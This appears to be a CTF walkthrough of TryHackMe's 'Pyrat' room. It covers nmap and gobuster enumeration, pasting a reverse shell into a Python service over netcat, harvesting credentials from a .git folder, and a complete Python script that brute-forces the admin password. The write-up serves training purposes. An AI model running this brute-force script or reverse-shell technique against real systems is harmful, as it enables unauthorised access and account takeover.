Are you ready to tame the Pyrat? In this walkthrough, we’ll conquer the “Pyrat” easy-level CTF room from TryHackMe — step by step. Whether you’re looking to sharpen your enumeration skills, practice privilege escalation, or simply hungry for another flag, this guide lays out the process clearly for beginners and seasoned hackers alike. Grab your terminal, and let’s jump right into the challenge!

Once the machine was launched on TryHackMe, the first step was to discover which services were running and accessible from my attack box. I used the following nmap command to perform both standard and versioned service enumeration:

nmap -sCV -vv <target-ip>

This command scans the most common ports, probes for service versions, and provides verbose output — crucial for easy CTF rooms where quick wins are common. The scan results revealed that an HTTP service was running on port 8000.

With nmap showing an HTTP service on port 8000, I tried accessing the target in my browser.

Tip: If you visit http://<target-ip> without specifying the port, you’ll see nothing or get a connection error. Be sure to use:

http://<target-ip>:8000

The web page loaded — simple and unremarkable, with no interactive elements or immediate clues.

Initial attempts to enumerate directories and files automatically (using Gobuster with a common wordlist) didn’t yield any results:

gobuster dir -u http://<target-ip>:8000 -w /usr/share/wordlists/dirb/common.txt

But as highlighted by the room description: automated fuzzing wasn’t effective here.

Since automated fuzzing wasn’t helpful and the challenge description hinted at using a more basic connection, I switched tactics and tried connecting manually with Netcat:

nc <target-ip> 8000

Upon connecting, I received a message indicating that a Python script was running on the server. This was a strong hint that the web service could potentially execute Python code — an opportunity to gain command execution.

To escalate access, I generated a Python reverse shell payload using an online generator (such as revshells.com). In the generator:

• IP Address: Entered my TryHackMe VPN IP
• Port: Chose an open port on my system (e.g., 4444)

I then copied the generated Python code. Before executing the reverse shell, I set up a listener on my attack machine:

nc -lnvp 4444

With the listener ready, I pasted the Python reverse shell code in the Netcat session. When the connection was successful, I received a shell as the target user on my listener — confirming initial access to the box!

With a reverse shell on the machine, the next step was to explore the filesystem for useful information.

I navigated to the /var directory and discovered a mail folder:

cd /var/mail
cat mail

Inside the mail files, I spotted useful hints — particularly emails referencing GitHub, which suggested the presence of git repositories or files nearby.

Following this lead, I searched for any .git directory or files on the system, which can sometimes inadvertently leak sensitive information, including credentials.

Luckily, I found a .git folder in one of the user directories, which contained the credentials for a user named think.

Armed with these credentials, I proceeded to attempt SSH access to gain a more stable and interactive shell session on the machine.

Using the credentials gathered from the .git repository, I logged into the machine via SSH for a more reliable shell:

ssh think@<target-ip>

This confirmed successful foothold as the user think.

To escalate privileges, I began by investigating potential vectors related to Git, since the earlier discovery of a .git repository hinted at possible misconfigurations.

I explored the system for services running with elevated permissions and checked for any scripts or processes where the compromised user might have additional access.

Following enumeration, I identified a script named pyrat.py that appeared to accept login credentials.

Using this script, I attempted to brute-force the password for a privileged user (admin) by leveraging a password wordlist (rockyou.txt).

Here’s the Python script I used to automate this brute force:

import socket
# Configuration
target_ip = "10.10.76.170"  # Target IP {CHANGE THIS}
target_port = 8000          # Target port
password_wordlist = "/usr/share/wordlists/rockyou.txt"  # Path to the password wordlist file
def connect_and_send_password(password):
    try:
        client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        client_socket.connect((target_ip, target_port))
        client_socket.sendall(b'admin\n')
        response = client_socket.recv(1024).decode()
        print(f"Server response after sending 'admin': {response}")
        if "Password:" in response:
            print(f"Trying password: {password}")
            client_socket.sendall(password.encode() + b"\n")
            response = client_socket.recv(1024).decode()
            if "success" in response.lower() or "admin" in response.lower():
                print(f"Server response for password '{password}': {response}")
                return True
            else:
                print(f"Password '{password}' is incorrect or no response.")
        return False
    except Exception as e:
        print(f"Error: {e}")
        return False
    finally:
        client_socket.close()
def fuzz_passwords():
    with open(password_wordlist, "r", encoding="latin-1") as file:  # Updated to use encoding="latin-1"
        passwords = file.readlines()
    for password in passwords:
        password = password.strip()  # Remove any newline characters
        if connect_and_send_password(password):
            print(f"Correct password found: {password}")
            break
        else:
            print(f"Password {password} was incorrect. Reconnecting...")
if __name__ == "__main__":
    fuzz_passwords()

Once the correct password was discovered (in this case, abc123), I logged in as admin through netcat:

nc <target-ip> 8000
admin
abc123

Finally, I navigated to the root directory and read the root flag:

cd /root
cat root.txt

The Pyrat TryHackMe challenge provided a solid introduction to web service enumeration, manual interaction, and privilege escalation through Git-related vulnerabilities and password brute-forcing.

Key lessons learned include:

• Manual exploration can outperform automated fuzzing when challenges are designed to resist common scanners.
• Basic tools like Netcat are invaluable for gaining initial access, especially when services interact over raw sockets.
• Gathering credentials from unexpected places (like mail or Git repositories) can turn the tide in a CTF.
• Automating brute-force attacks with custom scripts enables efficient password discovery, especially when tailored to service-specific protocols.
• Finally, maintaining patience and persistence is critical — success often comes from combining multiple small discoveries.

This walkthrough aims to equip beginners with practical techniques and encourage deeper exploration beyond automated tools. Happy hacking!

If you enjoyed this walkthrough, consider following me and giving a clap — your support really motivates me! Until the next write-up, happy hacking! :)